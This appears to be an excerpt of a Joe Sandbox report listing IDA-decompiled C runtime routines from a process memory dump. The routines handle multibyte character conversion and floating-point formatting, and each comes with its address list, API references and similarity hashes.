          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: AllocateHeap_free_malloc
          • String ID:
          • API String ID: 1020059152-0
          • Opcode ID: 0340bebe6e1ae5faa1b28a18bb9a702f69a4ef677467ec9682ab799a5869e030
          • Instruction ID: 4d5955e40342943e030903fe786adc176c33de91cff1710f495c04ae67d37c94
          • Opcode Fuzzy Hash: 0340bebe6e1ae5faa1b28a18bb9a702f69a4ef677467ec9682ab799a5869e030
          • Instruction Fuzzy Hash: B1119431A896159ACB213F78BC49B593FD8EF04363B2049E5FD589B390DFB58948C690
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00B591C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
          				char _v8;
          				intOrPtr _v12;
          				signed int _v20;
          				signed int _t35;
          				int _t38;
          				signed int _t41;
          				int _t42;
          				intOrPtr* _t44;
          				int _t47;
          				short* _t49;
          				intOrPtr _t50;
          				intOrPtr _t54;
          				int _t55;
          				signed int _t59;
          				char* _t62;
          
          				_t62 = _a8;
          				if(_t62 == 0) {
          					L5:
          					return 0;
          				}
          				_t50 = _a12;
          				if(_t50 == 0) {
          					goto L5;
          				}
          				if( *_t62 != 0) {
          					E00B54BFC( &_v20, _a16);
          					_t35 = _v20;
          					__eflags =  *(_t35 + 0xa8);
          					if( *(_t35 + 0xa8) != 0) {
          						_t38 = E00B5917B( *_t62 & 0x000000ff,  &_v20);
          						__eflags = _t38;
          						if(_t38 == 0) {
          							__eflags = _a4;
          							_t41 = _v20;
          							_t59 = 1;
          							_t28 = _t41 + 4; // 0x840ffff8
          							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
          							__eflags = _t42;
          							if(_t42 != 0) {
          								L21:
          								__eflags = _v8;
          								if(_v8 != 0) {
          									_t54 = _v12;
          									_t31 = _t54 + 0x70;
          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
          									__eflags =  *_t31;
          								}
          								return _t59;
          							}
          							L20:
          							_t44 = E00B51CC3();
          							_t59 = _t59 | 0xffffffff;
          							__eflags = _t59;
          							 *_t44 = 0x2a;
          							goto L21;
          						}
          						_t59 = _v20;
          						__eflags =  *(_t59 + 0x74) - 1;
          						if( *(_t59 + 0x74) <= 1) {
          							L15:
          							_t20 = _t59 + 0x74; // 0xe1c11fe1
          							__eflags = _t50 -  *_t20;
          							L16:
          							if(__eflags < 0) {
          								goto L20;
          							}
          							__eflags = _t62[1];
          							if(_t62[1] == 0) {
          								goto L20;
          							}
          							L18:
          							_t22 = _t59 + 0x74; // 0xe1c11fe1
          							_t59 =  *_t22;
          							goto L21;
          						}
          						_t12 = _t59 + 0x74; // 0xe1c11fe1
          						__eflags = _t50 -  *_t12;
          						if(__eflags < 0) {
          							goto L16;
          						}
          						__eflags = _a4;
          						_t17 = _t59 + 0x74; // 0xe1c11fe1
          						_t18 = _t59 + 4; // 0x840ffff8
          						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
          						_t59 = _v20;
          						__eflags = _t47;
          						if(_t47 != 0) {
          							goto L18;
          						}
          						goto L15;
          					}
          					_t55 = _a4;
          					__eflags = _t55;
          					if(_t55 != 0) {
          						 *_t55 =  *_t62 & 0x000000ff;
          					}
          					_t59 = 1;
          					goto L21;
          				}
          				_t49 = _a4;
          				if(_t49 != 0) {
          					 *_t49 = 0;
          				}
          				goto L5;
          			}


















          0x00b591ce
          0x00b591d3
          0x00b591ed
          0x00000000
          0x00b591ed
          0x00b591d5
          0x00b591da
          0x00000000
          0x00000000
          0x00b591df
          0x00b591fc
          0x00b59201
          0x00b59204
          0x00b5920b
          0x00b5922a
          0x00b59231
          0x00b59233
          0x00b59277
          0x00b59283
          0x00b59286
          0x00b5928b
          0x00b5928e
          0x00b59294
          0x00b59296
          0x00b592a6
          0x00b592a6
          0x00b592aa
          0x00b592ac
          0x00b592af
          0x00b592af
          0x00b592af
          0x00b592af
          0x00000000
          0x00b592b5
          0x00b59298
          0x00b59298
          0x00b5929d
          0x00b5929d
          0x00b592a0
          0x00000000
          0x00b592a0
          0x00b59235
          0x00b59238
          0x00b5923c
          0x00b59265
          0x00b59265
          0x00b59265
          0x00b59268
          0x00b59268
          0x00000000
          0x00000000
          0x00b5926a
          0x00b5926e
          0x00000000
          0x00000000
          0x00b59270
          0x00b59270
          0x00b59270
          0x00000000
          0x00b59270
          0x00b5923e
          0x00b5923e
          0x00b59241
          0x00000000
          0x00000000
          0x00b59245
          0x00b5924f
          0x00b59255
          0x00b59258
          0x00b5925e
          0x00b59261
          0x00b59263
          0x00000000
          0x00000000
          0x00000000
          0x00b59263
          0x00b5920d
          0x00b59210
          0x00b59212
          0x00b59217
          0x00b59217
          0x00b5921c
          0x00000000
          0x00b5921c
          0x00b591e1
          0x00b591e6
          0x00b591ea
          0x00b591ea
          0x00000000

          APIs
          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B591FC
          • __isleadbyte_l.LIBCMT ref: 00B5922A
          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00B59258
          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00B5928E
          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
          • String ID:
          • API String ID: 3058430110-0
          • Opcode ID: e49a24fb21e679e9ee0726865151c2eb1a93fb4431f6b1d6b145df228ab21979
          • Instruction ID: 5af9cba1289809d0ce770f57e49b203de4ccde6a590ff3f552d61bc299a8ffa8
          • Opcode Fuzzy Hash: e49a24fb21e679e9ee0726865151c2eb1a93fb4431f6b1d6b145df228ab21979
          • Instruction Fuzzy Hash: A331F03160025AFFDB218F65CC48BAA7BE5FF41352F1581E8EC24971A0D732D898DB90
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00B5A94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
          				intOrPtr _t25;
          				void* _t26;
          
          				_t25 = _a16;
          				if(_t25 == 0x65 || _t25 == 0x45) {
          					_t26 = E00B5AE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
          					goto L9;
          				} else {
          					_t34 = _t25 - 0x66;
          					if(_t25 != 0x66) {
          						__eflags = _t25 - 0x61;
          						if(_t25 == 0x61) {
          							L7:
          							_t26 = E00B5A9D3(_a4, _a8, _a12, _a20, _a24, _a28);
          						} else {
          							__eflags = _t25 - 0x41;
          							if(__eflags == 0) {
          								goto L7;
          							} else {
          								_t26 = E00B5B119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
          							}
          						}
          						L9:
          						return _t26;
          					} else {
          						return E00B5B058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
          					}
          				}
          			}





          0x00b5a950
          0x00b5a956
          0x00b5a9c9
          0x00000000
          0x00b5a95d
          0x00b5a95d
          0x00b5a960
          0x00b5a97b
          0x00b5a97e
          0x00b5a99e
          0x00b5a9b0
          0x00b5a980
          0x00b5a980
          0x00b5a983
          0x00000000
          0x00b5a985
          0x00b5a997
          0x00b5a997
          0x00b5a983
          0x00b5a9ce
          0x00b5a9d2
          0x00b5a962
          0x00b5a97a
          0x00b5a97a
          0x00b5a960

          APIs
          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
          • String ID:
          • API String ID: 3016257755-0
          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
          • Instruction ID: cdeb29173f8d62439b1330e9d8e6e1c7d4bd4930eabf05c874aab351d5694c28
          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
          • Instruction Fuzzy Hash: 60014E3604015EBBCF125E84CC51DEE3FA2BB18356B598695FE1968031D336C9B5AB82
          Uniqueness

          Uniqueness Score: -1.00%